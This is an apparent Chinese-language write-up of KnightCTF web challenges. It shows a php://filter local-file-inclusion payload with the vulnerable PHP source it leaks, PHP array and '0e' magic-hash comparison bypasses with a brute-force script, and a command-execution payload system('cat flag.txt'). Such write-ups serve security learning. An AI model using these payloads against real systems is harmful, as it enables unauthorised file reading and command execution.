KNIGHTCTF

WEB

Sometime you need to look wayback

在源码中看到一个网址,是github的image-20220121164920578

访问并查看commit得到flag

Obsfuscation Isn’t Enough

image-20220121165023175

查看网页源代码,发现jsfuck,丢进控制台,解码得到150484514b6eeb1d99da836d95f6671d.phpimage-20220121165119842

访问,得到

自动换行
KCTF{0bfuscat3d_J4v4Scr1pt_aka_JSFuck}

Find Pass Code - 1

image-20220121165626024

从源码的注释得到提示,传一个值为param的source参数,于是

image-20220121165721770

这阴间配色属实辣眼睛,简单的数组绕过pass_code[]=a

用hackbar来post一下就出flag了

My PHP Site

payload;

?file=php://filter/read=convert.base64-encode/resource=index.php

得到base64

PD9waHAKCmlmKGlzc2V0KCRfR0VUWydmaWxlJ10pKXsKICAgIGlmICgkX0dFVFsnZmlsZSddID09ICJpbmRleC5waHAiKSB7CiAgICAgICAgZWNobyAiPGgxPkVSUk9SISE8L2gxPiI7CiAgICAgICAgZGllKCk7CiAgICB9ZWxzZXsKICAgICAgICBpbmNsdWRlICRfR0VUWydmaWxlJ107CiAgICB9Cgp9ZWxzZXsKICAgIGVjaG8gIjxoMT5Zb3UgYXJlIG1pc3NpbmcgdGhlIGZpbGUgcGFyYW1ldGVyPC9oMT4iOwoKICAgICNub3RlIDotIHNlY3JldCBsb2NhdGlvbiAvaG9tZS90YXJlcS9zM2NyRXRfZmw0OS50eHQKfQoKPz4KCjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJlbiI+CjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDx0aXRsZT5UYXJlcSdzIEhvbWUgUGFnZTwvdGl0bGU+CjwvaGVhZD4KPGJvZHk+CjwvYm9keT4KPC9odG1sPgo=

解码得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php

if(isset($_GET['file'])){
    if ($_GET['file'] == "index.php") {
        echo "<h1>ERROR!!</h1>";
        die();
    }else{
        include $_GET['file'];
    }

}else{
    echo "<h1>You are missing the file parameter</h1>";

    #note :- secret location /home/tareq/s3crEt_fl49.txt
}

?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Tareq's Home Page</title>
</head>
<body>
</body>
</html>
1
?file=s3crEt_fl49.txt

得到flag

Find Pass Code - 2

先拿到源码

image-20220121170439047

如出一辙的阴间配色

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
require "flag.php";
$old_pass_codes = array("0e215962017", "0e730083352", "0e807097110", "0e840922711");
$old_pass_flag = false;
if (isset($_POST["pass_code"]) && !is_array($_POST["pass_code"])) {
    foreach ($old_pass_codes as $old_pass_code) {
        if ($_POST["pass_code"] === $old_pass_code) {
            $old_pass_flag = true;
            break;
        }
    }
    if ($old_pass_flag) {
        echo "Sorry ! It's an old pass code.";
    } else if ($_POST["pass_code"] == md5($_POST["pass_code"])) {
        echo "KCTF Flag : {$flag}";
    } else {
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    print show_source(__FILE__);
}

?>

这里需要绕过$_POST[“pass_code”] == md5($_POST[“pass_code”]

即需要找到以0e开头且md5后也是0e开头的值

这里用到脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import hashlib
 
def md5_enc(s):
    m = hashlib.md5()
    m.update(str(s).encode('utf-8'))
    return m.hexdigest()
 
if __name__ == '__main__':
    result = []
    for i in range(0, 9999999999):
        i = '0e' + str(i)
        enc = md5_enc(i)
        print(i+" md5 is "+enc)
        # md5值前两位为0e
        if enc[:2] == "0e":
            # md5值0e后为纯数字
            if enc[2:].isdigit():
                result.append(i)
                print("Got Result:"+i)
                break

不过这里”0e215962017”, “0e730083352”, “0e807097110”, “0e840922711”不能使用,因为是old_pass_codes

这里用的是0e00275209979

payload:

1
pass_code=0e00275209979

Zero is not the limit

零不是极限那就试试-1,image-20220121180726470

image-20220121180810885

Do Something Special

image-20220121180920816

image-20220121180947561

url无法访问这个,应该是编码问题,将其url编码后再访问,得到flag

Most Secure Calculator - 1

直接命令执行system("cat flag.txt")

image-20220121181619200

MISC

The Hungry Dragon

3个圈11个球

image-20220121184103623

KCTF{3_doughnut_and_11_sweet}